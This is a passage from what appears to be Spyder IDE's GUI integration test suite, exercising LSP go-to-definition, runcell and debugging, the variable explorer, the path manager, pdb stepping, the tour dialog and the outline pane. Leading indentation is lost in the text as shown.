# Create new editor with code and wait until LSP is ready
main_window.editor.new(text=code_def)
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_open()
# Move cursor to the left one character to be next to QtCore
code_editor.move_cursor(-1)
with qtbot.waitSignal(code_editor.lsp_response_signal):
code_editor.go_to_definition_from_cursor()
def _get_filenames():
return [osp.basename(f) for f in main_window.editor.get_filenames()]
qtbot.waitUntil(lambda: 'QtCore.py' in _get_filenames())
assert 'QtCore.py' in _get_filenames()
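# A minimal sketch of the LSP 'textDocument/definition' request that
# go_to_definition_from_cursor() is assumed to send through Spyder's
# completion client. The payload follows the Language Server Protocol;
# the field values here are placeholders.
def _definition_request_sketch(file_uri, line, character, request_id=1):
    return {
        'jsonrpc': '2.0',
        'id': request_id,
        'method': 'textDocument/definition',
        'params': {
            'textDocument': {'uri': file_uri},
            # LSP positions are zero-based for both line and character.
            'position': {'line': line, 'character': character},
        },
    }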
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin' and not PY2,
reason="It times out on macOS/PY3")
def test_debug_unsaved_file(main_window, qtbot):
"""Test that we can debug an unsaved file."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
control = shell._control
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text('print(0)\nprint(1)\nprint(2)')
# Set breakpoint
code_editor.debugger.toogle_breakpoint(line_number=2)
qtbot.wait(500)
# Start debugging
qtbot.mouseClick(debug_button, Qt.LeftButton)
# There is a breakpoint, so it should continue
qtbot.waitUntil(
lambda: '!continue' in shell._control.toPlainText())
qtbot.waitUntil(
lambda: "1---> 2 print(1)" in control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
"debug", [True, False])
def test_runcell(main_window, qtbot, tmpdir, debug):
"""Test the runcell command."""
# Write code with a cell to a file
code = u"result = 10; fname = __file__"
p = tmpdir.join("cell-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
if debug:
function = 'debugcell'
else:
function = 'runcell'
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute(function + u"(0, r'{}')".format(to_text_string(p)))
if debug:
# Reach the 'name' input
shell.pdb_execute('!c')
qtbot.wait(1000)
# Verify that the `result` variable is defined
assert shell.get_value('result') == 10
# Verify that the `fname` variable is `cell-test.py`
assert "cell-test.py" in shell.get_value('fname')
# Verify that the `__file__` variable is undefined
try:
shell.get_value('__file__')
assert False
except KeyError:
pass
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_leading_indent(main_window, qtbot, tmpdir):
"""Test the runcell command with leading indent."""
# Write code with a cell to a file
code = ("def a():\n return\nif __name__ == '__main__':\n"
"# %%\n print(1233 + 1)\n")
p = tmpdir.join("cell-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute("runcell(1, r'{}')".format(to_text_string(p)))
assert "1234" in shell._control.toPlainText()
assert "This is not valid Python code" not in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_rename(main_window, qtbot, tmpdir):
"""
Test renaming a variable.
Regression test for spyder-ide/spyder#10735
"""
# ---- Setup ----
p = (tmpdir.mkdir(u"varexp_rename").join(u"script.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# ---- Run file ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Rename one element
nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
nsb.editor.rename_item(new_name='arr2')
# Wait until all objects have updated in the variable explorer
def data(cm, i, j):
return cm.data(cm.index(i, j))
qtbot.waitUntil(lambda: data(nsb.editor.model, 1, 0) == 'arr2',
timeout=EVAL_TIMEOUT)
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'arr2'
assert data(nsb.editor.model, 2, 0) == 'li'
assert data(nsb.editor.model, 3, 0) == 's'
# ---- Run file again ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 5,
timeout=EVAL_TIMEOUT)
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'arr'
assert data(nsb.editor.model, 2, 0) == 'arr2'
assert data(nsb.editor.model, 3, 0) == 'li'
assert data(nsb.editor.model, 4, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_remove(main_window, qtbot, tmpdir):
"""
Test removing a variable.
Regression test for spyder-ide/spyder#10709
"""
# ---- Setup ----
p = (tmpdir.mkdir(u"varexp_remove").join(u"script.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# ---- Run file ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Remove one element
nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
nsb.editor.remove_item(force=True)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 3,
timeout=EVAL_TIMEOUT)
def data(cm, i, j):
assert cm.rowCount() == 3
return cm.data(cm.index(i, j))
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'li'
assert data(nsb.editor.model, 2, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_refresh(main_window, qtbot):
"""
Test refreshing the variable explorer while the kernel is executing.
"""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
control = main_window.ipyconsole.get_focus_widget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
shell.execute("import time\n"
"for i in range(10):\n"
" print('i = {}'.format(i))\n"
" time.sleep(.1)\n")
qtbot.waitUntil(lambda: "i = 0" in control.toPlainText())
qtbot.wait(300)
# Get value object
nsb = main_window.variableexplorer.get_focus_widget()
# This is empty
assert len(nsb.editor.source_model._data) == 0
nsb.refresh_table()
qtbot.waitUntil(lambda: len(nsb.editor.source_model._data) == 1)
assert 0 < int(nsb.editor.source_model._data['i']['view']) < 9
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_edge_cases(main_window, qtbot, tmpdir):
"""
Test if runcell works with an unnamed cell at the top of the file
and with an empty cell.
"""
# Write code with a cell to a file
code = ('if True:\n'
' a = 1\n'
'#%%')
p = tmpdir.join("test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
code_editor = main_window.editor.get_focus_widget()
# call runcell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert 'runcell(0' in shell._control.toPlainText()
assert 'cell is empty' not in shell._control.toPlainText()
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert 'runcell(1' in shell._control.toPlainText()
assert 'Error' not in shell._control.toPlainText()
assert 'cell is empty' in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_pdb(main_window, qtbot):
"""Test the runcell command in pdb."""
# Write code with a cell to a file
code = ("if 'abba' in dir():\n"
" print('abba {}'.format(abba))\n"
"else:\n"
" def foo():\n"
" abba = 27\n"
" foo()\n")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
for key in ['!n', '!n', '!s', '!n', '!n']:
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(shell._control, key)
qtbot.keyClick(shell._control, Qt.Key_Enter)
assert shell.get_value('abba') == 27
code_editor.setFocus()
# call runcell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert "runcell" in shell._control.toPlainText()
# Make sure the local variables are detected
assert "abba 27" in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
"debug", [False, True])
def test_runcell_cache(main_window, qtbot, debug):
"""Test the runcell command cache."""
# Write code with a cell to a file
code = ("import time\n"
"time.sleep(.5)\n"
"# %%\n"
"print('Done')\n")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
if debug:
# Start debugging
with qtbot.waitSignal(shell.executed):
shell.execute("%debug print()")
# Run the two cells
code_editor.setFocus()
code_editor.move_cursor(0)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(100)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.waitUntil(lambda: "Done" in shell._control.toPlainText())
# --- Path manager
# ----------------------------------------------------------------------------
@pytest.mark.slow
def test_path_manager_updates_clients(qtbot, main_window, tmpdir):
"""Check that on path manager updates, consoles correctly update."""
main_window.show_path_manager()
dlg = main_window._path_manager
test_folder = 'foo-spam-bar-123'
folder = str(tmpdir.mkdir(test_folder))
dlg.add_path(folder)
qtbot.waitUntil(lambda: dlg.button_ok.isEnabled(), timeout=EVAL_TIMEOUT)
with qtbot.waitSignal(dlg.sig_path_changed, timeout=EVAL_TIMEOUT):
dlg.button_ok.animateClick()
cmd = 'import sys;print(sys.path)'
# Check Spyder is updated
main_window.console.execute_lines(cmd)
syspath = main_window.console.get_sys_path()
assert folder in syspath
# Check clients are updated
count = 0
for client in main_window.ipyconsole.get_clients():
shell = client.shellwidget
if shell is not None:
syspath = shell.execute(cmd)
control = shell._control
# `shell.executed` signal was not working so we use waitUntil
qtbot.waitUntil(lambda: 'In [2]:' in control.toPlainText(),
timeout=EVAL_TIMEOUT)
assert test_folder in control.toPlainText()
count += 1
assert count >= 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
reason="It times out on macOS and Windows")
def test_pdb_key_leak(main_window, qtbot, tmpdir):
"""
    Check that the pdb notification to Spyder doesn't call
    QApplication.processEvents(). If it does, there might be keystroke leakage.
    See spyder-ide/spyder#10834.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = shell._control
# Write code to a file
code1 = ("def a():\n"
" 1/0")
code2 = ("from tmp import a\n"
"a()")
folder = tmpdir.join('tmp_folder')
test_file = folder.join('tmp.py')
test_file.write(code1, ensure=True)
test_file2 = folder.join('tmp2.py')
test_file2.write(code2)
# Run tmp2 and get an error
with qtbot.waitSignal(shell.executed):
shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
'", wdir="' + str(folder).replace("\\", "/") + '")')
assert '1/0' in control.toPlainText()
# Replace QApplication.processEvents to make sure it is not called
super_processEvents = QApplication.processEvents
def processEvents():
processEvents.called = True
return super_processEvents()
processEvents.called = False
try:
QApplication.processEvents = processEvents
# Debug and open both files
with qtbot.waitSignal(shell.executed):
shell.execute('%debug')
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!u')
qtbot.keyClick(control, Qt.Key_Enter)
# Wait until both files are open
qtbot.waitUntil(
lambda: osp.normpath(str(test_file)) in [
osp.normpath(p) for p in main_window.editor.get_filenames()])
qtbot.waitUntil(
lambda: str(test_file2) in [
osp.normpath(p) for p in main_window.editor.get_filenames()])
# Make sure the events are not processed.
assert not processEvents.called
finally:
QApplication.processEvents = super_processEvents
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It times out on macOS")
@pytest.mark.parametrize(
"where", [True, False])
def test_pdb_step(main_window, qtbot, tmpdir, where):
"""
    Check that, when pdb notifies Spyder, the editor only moves when a new line is reached.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = shell._control
# Write code to a file
code1 = ("def a():\n"
" 1/0")
code2 = ("from tmp import a\n"
"a()")
folder = tmpdir.join('tmp_folder')
test_file = folder.join('tmp.py')
test_file.write(code1, ensure=True)
test_file2 = folder.join('tmp2.py')
test_file2.write(code2)
# Run tmp2 and get an error
with qtbot.waitSignal(shell.executed):
shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
'", wdir="' + str(folder).replace("\\", "/") + '")')
assert '1/0' in control.toPlainText()
# Debug and enter first file
with qtbot.waitSignal(shell.executed):
shell.execute('%debug')
qtbot.waitUntil(
lambda: osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file)))
# Move to another file
main_window.editor.new()
qtbot.wait(100)
assert main_window.editor.get_current_editor().filename != str(test_file)
current_filename = main_window.editor.get_current_editor().filename
# Run a random command, make sure we don't move
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!a')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
assert current_filename == main_window.editor.get_current_editor().filename
# Go up and enter second file
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!u')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file2)))
# Go back to first file
editor_stack = main_window.editor.get_current_editorstack()
index = editor_stack.has_filename(str(test_file))
assert index is not None
editor_stack.set_stack_index(index)
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file))
if where:
# go back to the second file with where
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!w')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Make sure we moved
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file2))
else:
# Stay at the same place
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!a')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Make sure we didn't move
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file))
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_after_restart(main_window, qtbot):
"""Test runcell after a kernel restart."""
# Write code to a file
code = "print('test_runcell_after_restart')"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Restart Kernel
with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
shell.ipyclient.restart_kernel()
# call runcell
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(
lambda: "test_runcell_after_restart" in shell._control.toPlainText())
# Make sure no errors are shown
assert "error" not in shell._control.toPlainText().lower()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
reason="It fails sometimes on Linux")
@pytest.mark.parametrize(
"ipython", [True, False])
@pytest.mark.parametrize(
"test_cell_magic", [True, False])
def test_ipython_magic(main_window, qtbot, tmpdir, ipython, test_cell_magic):
"""Test the runcell command with cell magic."""
# Write code with a cell to a file
write_file = tmpdir.mkdir("foo").join("bar.txt")
assert not osp.exists(to_text_string(write_file))
if test_cell_magic:
code = "\n\n%%writefile " + to_text_string(write_file) + "\ntest\n"
else:
code = "\n\n%debug print()"
if ipython:
fn = "cell-test.ipy"
else:
fn = "cell-test.py"
p = tmpdir.join(fn)
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute("runcell(0, r'{}')".format(to_text_string(p)))
control = main_window.ipyconsole.get_focus_widget()
error_text = 'save this file with the .ipy extension'
try:
if ipython:
if test_cell_magic:
qtbot.waitUntil(
lambda: 'Writing' in control.toPlainText())
# Verify that the code was executed
assert osp.exists(to_text_string(write_file))
else:
qtbot.waitSignal(shell.executed)
assert error_text not in control.toPlainText()
else:
qtbot.waitUntil(lambda: error_text in control.toPlainText())
finally:
if osp.exists(to_text_string(write_file)):
os.remove(to_text_string(write_file))
@pytest.mark.slow
@flaky(max_runs=3)
def test_running_namespace(main_window, qtbot, tmpdir):
"""
Test that the running namespace is correctly sent when debugging in a
new namespace.
"""
code = ("def test(a):\n print('a:',a)\na = 10\ntest(5)")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=2)
# Write b in the namespace
with qtbot.waitSignal(shell.executed):
shell.execute('b = 10')
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
assert nsb.editor.source_model._data['b']['view'] == '10'
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# b should not be there (running namespace) and the local a should be 5
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data and
nsb.editor.source_model._data['a']['view'] == '5',
timeout=3000)
assert 'b' not in nsb.editor.source_model._data
assert nsb.editor.source_model._data['a']['view'] == '5'
qtbot.waitUntil(shell.is_waiting_pdb_input)
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!c')
# At the end, b should be back and a should be 10
qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
assert nsb.editor.source_model._data['a']['view'] == '10'
assert nsb.editor.source_model._data['b']['view'] == '10'
@pytest.mark.slow
@flaky(max_runs=3)
def test_post_mortem(main_window, qtbot, tmpdir):
"""Test post mortem works"""
# Check we can use custom complete for pdb
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_focus_widget()
test_file = tmpdir.join('test.py')
test_file.write('raise RuntimeError\n')
with qtbot.waitSignal(shell.executed):
shell.execute(
"runfile(" + repr(str(test_file)) + ", post_mortem=True)")
assert "IPdb [" in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_unsaved_file_multiprocessing(main_window, qtbot):
"""Test that we can run an unsaved file with multiprocessing."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(
"import multiprocessing\n"
"import traceback\n"
        'if __name__ == "__main__":\n'
" p = multiprocessing.Process(target=traceback.print_exc)\n"
" p.start()\n"
" p.join()\n"
)
# This code should run even on windows
# Start running
qtbot.mouseClick(run_button, Qt.LeftButton)
    # Because multiprocessing behaves strangely on Windows, only some
    # situations work there. This is one of those situations, so it shouldn't
    # be broken.
if os.name == 'nt':
qtbot.waitUntil(
lambda: "Warning: multiprocessing" in shell._control.toPlainText())
else:
# There is no exception, so the exception is None
qtbot.waitUntil(
lambda: 'None' in shell._control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_cleared_after_kernel_restart(main_window, qtbot):
"""
Test that the variable explorer is cleared after a kernel restart.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a variable
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Restart Kernel
with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
shell.ipyclient.restart_kernel()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_cleared_after_reset(main_window, qtbot):
"""
Test that the variable explorer is cleared after triggering a
reset in the IPython console and variable explorer panes.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a variable
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Trigger a reset in the variable explorer
nsb.reset_namespace()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
# Create the variable again
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Trigger a reset in the console
shell.ipyclient.reset_namespace()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_immediate_debug(main_window, qtbot):
"""
Check if we can enter debugging immediately
"""
shell = main_window.ipyconsole.get_current_shellwidget()
with qtbot.waitSignal(shell.executed, timeout=SHELL_TIMEOUT):
shell.execute("%debug print()")
@pytest.mark.slow
@flaky(max_runs=3)
def test_local_namespace(main_window, qtbot, tmpdir):
"""
Test that the local namespace is not reset.
This can happen if `frame.f_locals` is called on the current frame, as this
has the side effect of discarding the pdb locals.
"""
code = ("""
def hello():
test = 1
print('test ==', test)
hello()
""")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=4)
nsb = main_window.variableexplorer.get_focus_widget()
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Check `test` has a value of 1
    # Here we use "waitUntil" because `shell.executed` is emitted twice:
    # once at the beginning of the file and once at the breakpoint
qtbot.waitUntil(lambda: 'test' in nsb.editor.source_model._data and
nsb.editor.source_model._data['test']['view'] == '1',
timeout=3000)
# change value of test
with qtbot.waitSignal(shell.executed):
shell.execute("test = 1 + 1")
# check value of test
with qtbot.waitSignal(shell.executed):
shell.execute("print('test =', test)")
assert "test = 2" in shell._control.toPlainText()
# change value of test
with qtbot.waitSignal(shell.executed):
shell.execute("test = 1 + 1 + 1")
# do next
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!next")
assert "test == 3" in shell._control.toPlainText()
# Check the namespace browser is updated
assert ('test' in nsb.editor.source_model._data and
nsb.editor.source_model._data['test']['view'] == '3')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_project
def test_ordering_lsp_requests_at_startup(main_window, qtbot):
"""
Test the ordering of requests we send to the LSP at startup when a
project was left open during the previous session.
This is a regression test for spyder-ide/spyder#13351.
"""
# Wait until the LSP server is up.
code_editor = main_window.editor.get_current_editor()
qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000)
# Wait until the initial requests are sent to the server.
lsp = main_window.completions.get_client('lsp')
python_client = lsp.clients['python']
qtbot.wait(5000)
expected_requests = [
(0, 'initialize'),
(1, 'initialized'),
(2, 'workspace/didChangeConfiguration'),
(3, 'workspace/didChangeWorkspaceFolders'),
(4, 'textDocument/didOpen'),
]
assert python_client['instance']._requests[:5] == expected_requests
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
'main_window',
[{'spy_config': ('main', 'show_tour_message', 2)}],
indirect=True)
def test_tour_message(main_window, qtbot):
"""Test that the tour message displays and sends users to the tour."""
# Wait until window setup is finished, which is when the message appears
qtbot.waitSignal(main_window.sig_setup_finished, timeout=30000)
# Check that tour is shown automatically and manually show it
assert CONF.get('main', 'show_tour_message')
main_window.show_tour_message(force=True)
# Wait for the message to appear
qtbot.waitUntil(lambda: bool(main_window.tour_dialog), timeout=5000)
qtbot.waitUntil(lambda: main_window.tour_dialog.isVisible(), timeout=2000)
# Check that clicking dismiss hides the dialog and disables it
qtbot.mouseClick(main_window.tour_dialog.dismiss_button, Qt.LeftButton)
qtbot.waitUntil(lambda: not main_window.tour_dialog.isVisible(),
timeout=2000)
assert not CONF.get('main', 'show_tour_message')
# Confirm that calling show_tour_message() normally doesn't show it again
main_window.show_tour_message()
qtbot.wait(2000)
assert not main_window.tour_dialog.isVisible()
# Ensure that it opens again with force=True
main_window.show_tour_message(force=True)
qtbot.waitUntil(lambda: main_window.tour_dialog.isVisible(), timeout=5000)
# Run the tour and confirm it's running and the dialog is closed
qtbot.mouseClick(main_window.tour_dialog.launch_tour_button, Qt.LeftButton)
qtbot.waitUntil(lambda: main_window.tour.is_running, timeout=9000)
assert not main_window.tour_dialog.isVisible()
assert not CONF.get('main', 'show_tour_message')
# Close the tour
main_window.tour.close_tour()
qtbot.waitUntil(lambda: not main_window.tour.is_running, timeout=9000)
main_window.tour_dialog.hide()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_project
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_update_outline(main_window, qtbot, tmpdir):
"""
Test that files in the Outline pane are updated at startup and
after switching projects.
"""
# Show outline explorer
outline_explorer = main_window.outlineexplorer
outline_explorer._toggle_view_action.setChecked(True)
# Get Python editor trees
treewidget = outline_explorer.explorer.treewidget
editors_py = [
editor for editor in treewidget.editor_ids.keys()
if editor.get_language() == 'Python'
]
# Wait a bit for trees to be filled
qtbot.wait(5000)
# Assert all Python editors are filled
assert all(
[
len(treewidget.editor_tree_cache[editor.get_id()]) > 0
for editor in editors_py
]
)
# Split editor
editorstack = main_window.editor.get_current_editorstack()
editorstack.sig_split_vertically.emit()
qtbot.wait(1000)
    # Select a file with no outline in the split editorstack
editorstack = main_window.editor.get_current_editorstack()
editorstack.set_stack_index(2)
editor = editorstack.get_current_editor()
assert osp.splitext(editor.filename)[1] == '.txt'
assert editor.is_cloned
# Assert tree is empty
editor_tree = treewidget.current_editor
tree = treewidget.editor_tree_cache[editor_tree.get_id()]
assert len(tree) == 0
# Assert spinner is not shown
assert not outline_explorer.explorer.loading_widget.isSpinning()
# Set one file as session without projects
prev_file = tmpdir.join("foo.py")
prev_file.write("def zz(x):\n"
" return x**2\n")
CONF.set('editor', 'filenames', [str(prev_file)])
# Close project to open that file automatically
main_window.projects.close_project()
# Wait a bit for its tree to be filled
